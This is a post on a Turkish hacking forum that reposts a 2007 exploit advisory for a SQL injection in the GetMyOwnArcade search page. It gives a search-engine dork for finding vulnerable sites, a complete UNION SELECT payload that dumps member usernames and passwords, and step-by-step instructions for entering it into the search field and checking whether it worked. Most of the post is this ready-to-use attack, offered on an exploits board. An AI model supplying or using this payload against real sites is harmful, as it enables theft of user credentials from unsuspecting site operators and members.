HGT Hack Good Team
Would you like to react to this message? Create an account in a few clicks or log in to continue.
HGT Hack Good Team

Sitemize Hos Geldiniz
 
AnasayfaAnasayfa  PortalliPortalli  AramaArama  Latest imagesLatest images  Kayıt OlKayıt Ol  Giriş yap  

 

 GetMyOwnArcade (search.php query) Remote SQL Injection Vulne

Aşağa gitmek 
YazarMesaj
Admin
Admin
Admin
Admin


Mesaj Sayısı : 131
Kayıt tarihi : 12/10/07

GetMyOwnArcade (search.php query) Remote SQL Injection Vulne Empty
MesajKonu: GetMyOwnArcade (search.php query) Remote SQL Injection Vulne   GetMyOwnArcade (search.php query) Remote SQL Injection Vulne Icon_minitimePtsi Ekim 15, 2007 2:13 pm

###############################################
### GetMyOwnArcade (search.php) ($query) SQL-Injection
###############################################
### Discovered By: RoXur777
### ***August 11th 2007
### Google-Dork: "Powered by GetMyOwnArcade"
###############################################
/*
* $query is not being filtered before getting passed to a query.
* Therefore, we can inject SQL code into the SQL-Query.
* Using UNION-SELECT we can obtain member information.
*/
###
##
#Straight-Forward:
#####################
### POST
### search.php
###"query=')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*"
#####################
###
##
#
If you did not understand the Straight-Forward version of the exploit then read this:
###
#
1) Use the search function on a GetMyOwnAracde site. (They are not always visible on index.php)
2) In the search field type:
#
#######
')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*
#######
#
3) Click Enter.
4) If exploitation was successful you should see usernames and passwords instead of the search results.
---
However if you see:
#
#######
Game search result for \')/**/union/**/.......
#######
#
That means that the exploit failed.
#
# milw0rm.com [2007-08-16]
Sayfa başına dön Aşağa gitmek
https://hackgoodteam.yetkin-forum.com
 
GetMyOwnArcade (search.php query) Remote SQL Injection Vulne
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities
» vBulletin 3.6.8 Remote File Include
» IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vu
» Joomla Component EventList <= 0.8 (did) SQL Injection Vul
» Game Portal Manager v1.7 SQL Injection Vulnerability

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
HGT Hack Good Team :: Hacking :: Exploitler-
Buraya geçin: